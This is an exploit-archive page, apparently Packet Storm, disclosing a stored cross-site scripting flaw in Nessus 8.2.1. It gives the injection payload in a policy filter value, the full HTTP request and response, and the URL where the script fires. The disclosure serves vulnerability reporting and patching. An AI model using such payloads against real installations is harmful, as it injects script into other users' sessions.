exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Nessus 8.2.1 Cross Site Scripting

Nessus 8.2.1 Cross Site Scripting
Posted Jan 29, 2019
Authored by Ozer Goker

Nessus version 8.2.1 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 870c026477c2c7e4f6eeb5fd5ac66be8cb2a5d20c5665183930084532b94c6ea

Nessus 8.2.1 Cross Site Scripting

Change Mirror Download
##################################################################################################################################
# Exploit Title: Nessus 8.2.1 | Stored Cross-Site Scripting
# Date: 29.01.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.tenable.com
# Software Link: https://www.tenable.com/downloads/nessus
# Version: 8.2.1
##################################################################################################################################

Introduction
Nessus is #1 For Vulnerability Assessment

>From the beginning, we've worked hand-in-hand with the security community.
We continuously optimize Nessus based on community feedback to make it the
most accurate and comprehensive vulnerability assessment solution in the
market. 20 years later and we're still laser focused on community
collaboration and product innovation to provide the most accurate and
complete vulnerability data - so you don't miss critical issues which could
put your organization at risk.


#################################################################################


XSS details: Stored

#################################################################################

XSS1 | Stored

URL
https://localhost:8834/policies

METHOD
Post

PARAMETER
value

PAYLOAD
\"><script>alert(1)</script>


Request

POST /policies HTTP/1.1
Host: localhost:8834
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost:8834/
Content-Type: application/json
X-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4
X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45
Content-Length: 3467
DNT: 1
Connection: close

{"uuid":"939a2145-95e3-0c3f-f1cc-761db860e4eed37b6eee77f9e101","dynamicPluginFilters":{"joinOperator":"and","filters":[{"filter":"cve","quality":"eq","value":"\"><script>alert(1)</script>"}]},"credentials":{"add":{},"edit":{},"delete":[]},"settings":{"patch_audit_over_rexec":"no","patch_audit_over_rsh":"no","patch_audit_over_telnet":"no","additional_snmp_port3":"161","additional_snmp_port2":"161","additional_snmp_port1":"161","snmp_port":"161","http_login_auth_regex_nocase":"no","http_login_auth_regex_on_headers":"no","http_login_invert_auth_regex":"no","http_login_max_redir":"0","http_reauth_delay":"","http_login_method":"POST","enable_admin_shares":"no","start_remote_registry":"no","dont_use_ntlmv1":"yes","never_send_win_creds_in_the_clear":"yes","attempt_least_privilege":"no","ssh_client_banner":"OpenSSH_5.0","ssh_port":"22","ssh_known_hosts":"","region_hkg_pref_name":"yes","region_syd_pref_name":"yes","region_lon_pref_name":"yes","region_iad_pref_name":"yes","region_ord_pref_name":"yes","region_dfw_pref_name":"yes","microsoft_azure_subscriptions_ids":"","aws_use_https":"yes","aws_verify_ssl":"yes","aws_ui_region_type":"Rest
of the
World","aws_sa_east_1":"","aws_ap_south_1":"","aws_ap_southeast_2":"","aws_ap_southeast_1":"","aws_ap_northeast_3":"","aws_ap_northeast_2":"","aws_ap_northeast_1":"","aws_eu_north_1":"","aws_eu_central_1":"","aws_eu_west_3":"","aws_eu_west_2":"","aws_eu_west_1":"","aws_ca_central_1":"","aws_us_west_2":"","aws_us_west_1":"","aws_us_east_2":"","aws_us_east_1":"","enable_plugin_list":"no","audit_trail":"full","enable_plugin_debugging":"no","log_whole_attack":"no","max_simult_tcp_sessions_per_scan":"","max_simult_tcp_sessions_per_host":"","max_hosts_per_scan":"30","max_checks_per_host":"5","network_receive_timeout":"5","reduce_connections_on_congestion":"no","slice_network_addresses":"no","stop_scan_on_disconnect":"no","safe_checks":"yes","display_unreachable_hosts":"no","log_live_hosts":"no","reverse_lookup":"no","allow_post_scan_editing":"yes","silent_dependencies":"yes","report_superseded_patches":"yes","report_verbosity":"Normal","scan_malware":"no","enum_local_users_end_uid":"1200","enum_local_users_start_uid":"1000","enum_domain_users_end_uid":"1200","enum_domain_users_start_uid":"1000","request_windows_domain_info":"yes","scan_webapps":"no","test_default_oracle_accounts":"no","provided_creds_only":"yes","smtp_to":"postmaster@
[AUTO_REPLACED_IP]","smtp_from":"nobody@example.com","smtp_domain":"
example.com","av_grace_period":"0","thorough_tests":"no","report_paranoia":"Normal","detect_ssl":"yes","check_crl":"no","enumerate_all_ciphers":"yes","cert_expiry_warning_days":"60","ssl_prob_ports":"Known
SSL
ports","svc_detection_on_all_ports":"yes","udp_scanner":"no","syn_scanner":"yes","syn_firewall_detection":"Automatic
(normal)","verify_open_ports":"no","only_portscan_if_enum_failed":"yes","snmp_scanner":"yes","wmi_netstat_scanner":"yes","ssh_netstat_scanner":"yes","portscan_range":"default","unscanned_closed":"no","wol_wait_time":"5","wol_mac_addresses":"","scan_ot_devices":"no","scan_netware_hosts":"no","scan_network_printers":"no","ping_the_remote_host":"yes","udp_ping":"no","icmp_ping":"yes","icmp_ping_retries":"2","icmp_unreach_means_host_down":"no","tcp_ping":"yes","tcp_ping_dest_ports":"built-in","arp_ping":"yes","fast_network_discovery":"no","test_local_nessus_host":"yes","acls":[{"object_type":"policy","permissions":0,"type":"default"}],"description":"","name":"test"}}

Response

HTTP/1.1 200 OK
Cache-Control:
X-Frame-Options: DENY
Content-Type: application/json
Date: : Tue, 29 Jan 2019 12:44:04 GMT
Connection: close
Server: NessusWWW
X-Content-Type-Options: nosniff
Content-Length: 38
Expires: 0
Pragma:

{"policy_id":161,"policy_name":"test"}


PoC
URL
https://localhost:8834/#/scans/policies/161/config/dynamic-plugins
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close